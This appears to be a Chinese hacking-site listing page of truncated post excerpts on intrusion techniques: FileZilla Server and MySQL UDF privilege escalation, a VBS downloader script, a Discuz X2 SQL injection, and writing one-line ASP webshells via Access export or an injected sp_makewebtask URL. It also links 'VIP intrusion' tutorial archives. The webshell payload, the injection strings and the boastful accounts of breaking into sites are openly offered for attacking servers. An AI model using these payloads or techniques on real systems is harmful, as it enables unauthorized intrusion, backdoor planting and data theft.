FileZilla Server提权
FileZilla Server应该好多牛人都知道怎么提权的了吧,很简单的,我再啰嗦一次 管理员密码以及端口都是保存在FileZilla Server Interface.xml文件里的 FileZilla Server Interface.xml内容大致如下 <FileZillaServer> <Settings> <Item name="Last Server P...
实用vbs
转自:黑鹰小子 1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.v...
Discuz X2 SQL /Xpath最新注入漏洞
请求方式:POST 影响页面: https://www.webshell.cc/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes 参数:username 参数测试:and 1=1 攻击细节: username=1+and+1=1&cookietime=259...
Access导出一句话拿shell实战
目标站: https://www.webshell.cc 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过图1中有执行SQL语句,重点来了: 执行代码: 1.create table cmd (a varc...
Mysql UDF提权
今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。 测试经典的UDF.dll提权一次性成功。 dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。 首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。 作者: 二、适用场合:1.目标系统是Windows(Win2000,XP,W...
FileZilla Server提权实例演示
前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。...
SA权限用sp_makewebtask直接在web目录里写入一句话
示范: http://127.0.0.1/XXXasp?id=3389';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';-- 前提是注入点是sa权限 用sp_makewebtask直接在web目录里写入一句话马: 条件是要sa权限和站点的web路...
安徽国库支付系统被黑客涮库
从2010年2月份开始,(安徽)黄山市黄山区财政局国库集中支付网络服务器被黑客入侵, 被他人增加了30多名新用户。直到近日,该区财政局网络管理员才发现,随即报警。目前, 警方已督促该区财政局尽快修复系统,由于案件正在侦破中,至于黑客入侵是否对国库资 金造成损失,警方表示尚不能透露。 经警方调查,发现该服务器竟然从去年2月起,至少被30余名黑客入侵,系统中被他人增加了30余名新用户。 据知情人士介绍...
缘分技术论坛的VIP教程
http://u.115.com/file/f73a707886 VIP入侵系列教程第一课.rar http://u.115.com/file/f7cb7065a VIP入侵系列教程第二课.rar http://u.115.com/file/f799279925 vip入侵系列教程第三课.rar http://u.115.com/file/f7bf95e6b5 vip入侵系列教程第四课.rar h...
老文赏:SQL注入思路与手工猜解大进阶
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入的思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总体的思路: ...